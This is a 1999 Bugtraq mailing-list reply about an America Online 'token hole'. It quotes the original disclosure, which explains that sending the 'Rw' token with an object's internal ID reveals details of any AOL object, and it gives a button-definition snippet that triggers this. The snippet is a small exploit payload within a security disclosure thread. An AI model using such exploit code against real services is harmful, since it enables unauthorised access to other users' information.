Bugtraq mailing list archives
Re: America Online Token Hole
From: granny () PINKFLOYD COM (John Schuster)
Date: Mon, 12 Jul 1999 16:05:49 -0000
I had contacted the person who posted this information. It seems that AOL has contacted him and he refuses to talk about this if you ask about it. Does anyone have any information on how to make your own programmable buttons for aol? granny About a year ago, I found out that by sending the "Rw" token to the AOL host while signed on along with the object's internal id as arg, any user could get detailed info about any object on the system. man_start_object < trigger, "" > mat_relative_tag < 22 > act_replace_select_action < uni_start_stream sm_send_token_arg <"Rw", INTERNAL ID HERE> uni_end_stream <FONT COLOR="#222255">> </FONT> mat_precise_x < 0 > mat_precise_y < 226 > mat_font_sis < small_fonts, 7, normal> mat_art_id < 1-0-21184 > mat_bool_default < yes > man_end_object comments questions.. <A HREF="mailto:mackk () rpi edu">mackk () rpi edu</A>
Current thread:
- America Online Token Hole Kevin Mack (Jul 08)
- Re: America Online Token Hole John Schuster (Jul 12)
- Re: America Online Token Hole Zero Divide (Jul 14)
- NMRC Advisory: Netware 5 Client Hijacking Simple Nomad (Jul 15)
- Re: America Online Token Hole John Schuster (Jul 12)